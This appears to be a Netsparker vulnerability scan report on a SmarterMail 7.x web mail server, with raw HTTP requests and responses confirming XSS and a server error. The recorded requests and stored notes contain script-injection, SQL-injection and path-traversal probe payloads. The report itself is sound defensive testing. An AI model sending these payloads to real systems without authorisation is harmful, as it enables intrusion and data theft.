__VIEWSTATE POST /wEPDwUKMTM5MjY3MTI5MQ8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIFDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgsPZBYCAgEPZBYCZg9kFgJmDw8WAh8DBQhVc2VybmFtZWRkZPswbOrdpTXGEdzIVEhkKOfRMh2Y
ctl00%24MPH%24txtDestMailbox_SettingText POST '"--><script>alert(0x003A5E)</script>
ctl00%24MPH%24txtDestFolder_SettingText POST 3

Request

POST /Main/frmPopupCopyArchiveMessagesToMailbox.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupCopyArchiveMessagesToMailbox.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 443
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTTARGET=ctl00%24BrPH%24btnOK&__EVENTARGUMENT=3&__VIEWSTATE=%2fwEPDwUKMTM5MjY3MTI5MQ8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIFDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgsPZBYCAgEPZBYCZg9kFgJmDw8WAh8DBQhVc2VybmFtZWRkZPswbOrdpTXGEdzIVEhkKOfRMh2Y&ctl00%24MPH%24txtDestMailbox_SettingText='%22--%3e%3cscript%3enetsparker(0x003A5E)%3c%2fscript%3e&ctl00%24MPH%24txtDestFolder_SettingText=3

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:37:23 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 2900
Connection: Close




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_head1"><title>
Copy To Mailbox
</title><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="innerpopup" dir="ltr">
<form method="post" action="frmPopupCopyArchiveMessagesToMailbox.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTM5MjY3MTI5MQ8WBB4QX19fUmVzdWx0RmFpbHVyZQVUVGhlIGFjY291bnQgWyciLS0+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAzQTVFKTwvc2NyaXB0PkBob3l0bGxjLmNvbV0gZG9lcyBub3QgZXhpc3QuHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgYCBQ8WAh4HVmlzaWJsZWhkAgcPZBYCZg9kFgICAQ8WAh8CZxYCAgEPFgIeBFRleHQF0QE8ZGl2IGNsYXNzPSJUaXBUZXh0RmFpbHVyZSI+PGltZyBzcmM9Ii9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL0ljb25zL1RpcFRleHQvRmFpbHVyZS5naWYiIGFsdD0iIi8gYWxpZ249ImFic21pZGRsZSI+IFRoZSBhY2NvdW50IFsnIi0tPjxzY3JpcHQ+bmV0c3BhcmtlcigweDAwM0E1RSk8L3NjcmlwdD5AaG95dGxsYy5jb21dIGRvZXMgbm90IGV4aXN0LjwvZGl2PmQCCw9kFgICAQ9kFgJmD2QWAmYPDxYCHwMFCFVzZXJuYW1lZGRkB0iSKOGWhtLBlhbaEz3HAy+UPiM=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>

<script language="javascript" type="text/javascript">
document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
$(function() { setTimeout(function() { GetFocus(); }, 50); RegisterResizeEvent(); });
</script>

<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1'], [], [], 90);
//]]>
</script>


<span id="ctl00_UpdatePanel1">
<div id="ctl00_TipTextDiv" class="TipTextContainer">
<div class="TipTextFailure"><img src="/App_Themes/Default/Images/Icons/TipText/Failure.gif" alt=""/ align="absmiddle"> The account ['"--><script>netsparker(0x003A5E)</script>@hoytllc.com] does not exist.</div>
</div>
</span>

<div id="Scrollable" class="ContentDiv">

<table id="ctl00_MPH_SettingsContainer1" class="SettingsContainer SCMarginTop" border="0">
<tr id="ctl00_MPH_txtDestMailbox">
<td id="ctl00_MPH_txtDestMailbox_Label" class="Indent Fixed">Username</td><td id="ctl00_MPH_txtDestMailbox_Setting" class="Setting"><input name="ctl00$MPH$txtDestMailbox_SettingText" type="text" value="'&quot;-->&lt;script>netsparker(0x003A5E)&lt;/script>" id="ctl00_MPH_txtDestMailbox_SettingText" class="text" /></td>
</tr><tr id="ctl00_MPH_txtDestFolder">
<td id="ctl00_MPH_txtDestFolder_Label" class="Indent Fixed">Folder</td><td id="ctl00_MPH_txtDestFolder_Setting" class="Setting"><input name="ctl00$MPH$txtDestFolder_SettingText" type="text" value="3" id="ctl00_MPH_txtDestFolder_SettingText" class="text" /></td>
</tr>
</table>

</div>
<div id="ctl00_Button" class="PopupButtons">
<div class="ButtonBarLeft">

</div>
<div class="ButtonBarRight">

<div id="ctl00_BrPH_btnCancel" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClosePopup();; return false;"><span class="BBInner">Cancel</span></a></div>
<div id="ctl00_BrPH_btnOK" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$btnOK',''); return false;"><span class="BBInner">OK</span></a></div>

</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>





<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserEmail', 0);
UpdateSidebarCounts('UserSync', 0);
Sys.Application.initialize();
Sys.Application.add_init(function() {if (self.valSwitchTab) self.valSwitchTab();});modules['isPostBack']=true;modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"Email Address","vcID":"ctl00_MPH_txtDestMailbox_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
$(function() {$vc({"lt":"Folder","vcID":"ctl00_MPH_txtDestFolder_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
//]]>
</script>
</form>
</body>
</html>

- /Main/frmNotes.aspx

/Main/frmNotes.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/frmNotes.aspx

Parameters

Parameter Type Value
ctl00%24MPH%24txtNote_SettingText POST '"--><script>alert(0x005DC0)</script>

Request

GET /Main/frmNotes.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 09:17:50 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11019
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNDA1MDIwMjQPFggeCF9fX1RpdGxlBQhNeSBOb3Rlcx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgQCAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFOk9wZW5OZXdNZXNzYWdlKCdmcm1Ob3RlLmFzcHg/cmV0PTEmcG9wdXA9dHJ1ZScsIDYwMCwgNTAwKTtkZAIDDw8WAh4OTmF2aWdhdGVUYXJnZXQFC2RvdWJsZWNsaWNrZGQCBA8WAh4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsWAgIBD2QWBgIBDw9kFgIeCk9uS2V5UHJlc3MFS3JldHVybiBFbnRlckhhbmRsZXIoZXZlbnQsIGZ1bmN0aW9uKCl7X19kb1Bvc3RCYWNrKCdjdGwwMCRTUEgkYnRuR28nLCcnKX0pO2QCAg8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQYKQWxsIENvbG9ycwVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQYABXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMGZ2dnZ2dnZGQCAw8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQMOQWxsIENhdGVnb3JpZXMLTm8gQ2F0ZWdvcnkdPHNjcmlwdD5ucygweDAwNUNEMSk8L3NjcmlwdD4VAwABIB08c2NyaXB0Pm5zKDB4MDA1Y2QxKTwvc2NyaXB0PhQrAwNnZ2dkZAIGDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwloFgICAQ8WAh4EVGV4dGVkAggPFgIfCWhkAgsPZBYCAgMPZBYCAgEPZBYCZg9kFgICAQ8PFgIfCgUMMTg0NSBub3RlKHMpZGQYAgUXY3RsMDAkTmF2UEgkSHlwZXJQYWdlcjEPBSBjdGwwMF9NUEhfSHlwZXJHcmlkMXwzN3wwfDl8NTB8MGQFFGN0bDAwJE1QSCRIeXBlckdyaWQxDwUxVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHJlYWxkYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGSx2MHk102+VgouU7iWTZ/qxhU+vA==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>

</div>
<div class="ButtonBarRight">


</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">

<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>

</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="&lt;script>ns(0x005cd1)&lt;/script>">&lt;script&gt;ns(0x005CD1)&lt;/script&gt;</option>

</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>

<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>

<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>

</div>


<span id="ctl00_UpdatePanel1">

</span>

<div id="Scrollable" class="ContentDiv">

<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">


<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden">&nbsp;</th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NjAxZGY1YWMzOWM1NGYxZGFlMjk5NmE4ZGNhMGNiNzk-" name="ctl00_MPH_HyperGrid1_CB64_NjAxZGY1YWMzOWM1NGYxZGFlMjk5NmE4ZGNhMGNiNzk-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">'"--><script>netsparker(0x005DC0)</script></td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MWVlOGFlMzNhYmIxNDcxZDhlYjg1YjkyYjYxYWUzZmE-" name="ctl00_MPH_HyperGrid1_CB64_MWVlOGFlMzNhYmIxNDcxZDhlYjg1YjkyYjYxYWUzZmE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">../../../../../CANTBEHERE/../../../../../etc/httpd/logs/error.log</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NGE5YjdmOThjMTBiNDdkNTljZDYwZWYxODRmODFiMzE-" name="ctl00_MPH_HyperGrid1_CB64_NGE5YjdmOThjMTBiNDdkNTljZDYwZWYxODRmODFiMzE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">-111 OR SLEEP(25)=0 LIMIT 1-- </td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NWQyYjViYzg2N2RlNDdhZGJlZWRlMTRlZTU3MDM5NGQ-" name="ctl00_MPH_HyperGrid1_CB64_NWQyYjViYzg2N2RlNDdhZGJlZWRlMTRlZTU3MDM5NGQ-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1 OR X='ss</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZWY5Y2Q4YmUwZjIyNDhjNzk0YjhjOTA4MWI1MGU4NmI-" name="ctl00_MPH_HyperGrid1_CB64_ZWY5Y2Q4YmUwZjIyNDhjNzk0YjhjOTA4MWI1MGU4NmI-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MzQ5YTU4YmIxNDU4NDllNThhNDVmZjczNDIzMTljY2Q-" name="ctl00_MPH_HyperGrid1_CB64_MzQ5YTU4YmIxNDU4NDllNThhNDVmZjczNDIzMTljY2Q-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">' OR '1'='1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTFmMWM3OGJhNGZkNDBkNDljMzBlZjdiNWM5ZTM2ODY-" name="ctl00_MPH_HyperGrid1_CB64_MTFmMWM3OGJhNGZkNDBkNDljMzBlZjdiNWM5ZTM2ODY-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">-1 OR 17-7=10</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzNhZDU4NjU1OTRjNGU2NmI2YzgwNGJmZmNhNDdjNTk-" name="ctl00_MPH_HyperGrid1_CB64_YzNhZDU4NjU1OTRjNGU2NmI2YzgwNGJmZmNhNDdjNTk-" /></td><td class="SmallImage"><table class="No..
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. This might be an indication of a bigger issue such as SQL Injection or could be the result or poor coding practices.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /Main/FileStorageUpload.ashx

/Main/FileStorageUpload.ashx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/FileStorageUpload.ashx?uploadValidationToken=803e98ef6b1f4c1ea432d11741311..

Request

GET /Main/FileStorageUpload.ashx?uploadValidationToken=803e98ef6b1f4c1ea432d117413113b5&pathField=&userField=dummy&domainField=hoytllc.com HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmStoredFiles.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:55:38 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html
Connection: Close




</pre></table></table></table></table></table></font></font></font></font></font></i></i></i></i></i></b></b></b></b></b></u></u></u></u></u><p>&nbsp;</p><hr>

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Runtime Error</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
<br><br>

